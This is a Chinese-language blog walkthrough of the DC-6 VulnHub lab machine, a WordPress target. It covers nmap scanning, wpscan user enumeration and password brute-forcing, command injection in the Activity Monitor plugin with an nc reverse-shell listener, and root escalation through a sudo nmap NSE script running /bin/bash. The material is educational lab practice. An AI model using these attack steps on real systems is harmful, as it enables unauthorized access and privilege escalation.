【CyberSecurityLearning 75】DC系列之DC-6渗透测试(WordPress)

目录

DC-6靶机渗透测试

1、信息收集

1.1 发现DC-6的IP地址

1.2 扫描开放端口

1.3 访问web网页(添加本地DNS解析)

1.4 Wpscan扫描站点(用户名)

2、WEB渗透

2.1 爆破WordPress站点用户名和密码

2.2 爆破后台路径

2.3、activity monitor漏洞利用

2.4  进入mark的家目录

2.5、反弹jens用户的shell

3、通过nmap提权


 

DC-6靶机渗透测试

0x00实验环境

靶机:DC-6,MAC地址:00:0C:29:85:9D:FD(192.168.3.190)

测试机:Kali,IP地址:192.168.3.188

1、信息收集

1.1 发现DC-6的IP地址

利用DC-6的MAC地址找到IP
命令:nmap -sP 192.168.3.1/24 -oN nmap.sP
发现DC-6的IP为192.168.3.190

1.2 扫描开放端口

nmap -A 192.168.3.190 -p 1-65535 -oN nmap.A

发现开放了22端口和80端口

以及:http-title: Did not follow redirect to http://wordy/    访问ip后会重定向到http://wordy/

1.3 访问web网页(添加本地DNS解析)

本机访问192.168.3.190,发现网页打不开,是因为没有添加本地DNS解析

我们在本机C:\Windows\System32\drivers\etc的hosts文件中添加

本地添加DNS解析之后,刷新后发现能成功访问(我们原来输入的是IP地址,它会自动跳转到wordy)

发现:
Wordy
Just another WordPress site

是一个WordPress(是国外三大开源的PHP CMS 之一)

除了本地需要修改hosts文件,那我们用kali虚拟机去访问目标80端口的时候,我们也需要去修改一下本机的host文件
vim /etc/hosts

1.4 Wpscan扫描站点(用户名)

wpscan --url wordy -e u           列出WordPress用户和账号

u枚举用户名,默认从1-10
--enumerate-e [option(s)]  枚举
--url-u  要扫描的`WordPress`站点.

在使用wpscan之前我们要做一个工具的更新:   wpscan --update    更新工具

2、WEB渗透

2.1 爆破WordPress站点用户名和密码

扫描后发现存在admin、sarah、graham、mark、jens用户,尝试爆破出密码

DC-6的作者在这里也给出了密码的提示https://www.vulnhub.com/entry/dc-6,315/

OK, this isn't really a clue as such, but more of some "we don't want to spend five years waiting for a certain process to finish" kind of advice for those who just want to get on with the job.

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. ;-)

先把admin、sarah、graham、mark、jens用户写在user.dic

wpscan --url wordy -U user.dic -P passwords.txt(使用wpscan爆破WordPress站点用户名和密码)

Username: mark,
Password: helpdesk01

2.2 爆破后台路径

Robots.txt 有时会写着,在一个一般开源cms都是有固定后台的,比如joomla后台路径就是administrator ,wordpress的就是wp_admin ,dedecms就是dede 常用的还有admin login manger 等等

登录后台:

发现使用了activity monitor插件

2.3、activity monitor漏洞利用

百度搜索其漏洞:http://blog.nsfocus.net/cve-2018-15877/

或者kali搜索其插件漏洞:
searchsploit active monitor

存在远程执行漏洞可以反弹shell 到本地

cp /usr/share/exploitdb/exploits/php/webapps/45274.html 45274.html

打开45274.html,修改如下两处地方

python -m SimpleHTTPServer

当前目录下开启http 服务

本机Submit request

本地再监听9999,发现没有反弹成功诶!

burp抓包看看:发现后面加管道符可以执行代码

可以看到漏洞说的确存在的,那么我们下一步就弹shell

我们现在本地监听一下:nc -lvvp 2333

抓包改包、放包

连接成功:

进入交互式shell

2.4  进入mark的家目录

- Add new user: graham - GSo7isUM1D4 - done

得到用户graham的密码,用ssh远程登录

检查sudo权限

可以看到 “backups.sh” 不需要密码,即可修改

利用这个sh脚本可以直接获取到jens的shell

2.5、反弹jens用户的shell

sudo -l看一下

 

3、通过nmap提权

nmap提权可以参考:https://gtfobins.github.io/gtfobins/nmap/#shell

echo "os.execute('/bin/bash')" >> root.nse    #将os.execute('/bin/bash')写入到root.nse文件中

sudo nmap --script=root.nse                         #利用nmap插件执行/bin/bash来获取root权限

1、用wpscan扫描用户名和爆破密码

2、activity monitor命令执行漏洞的利用

3、通过nmap插件来反弹shell

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值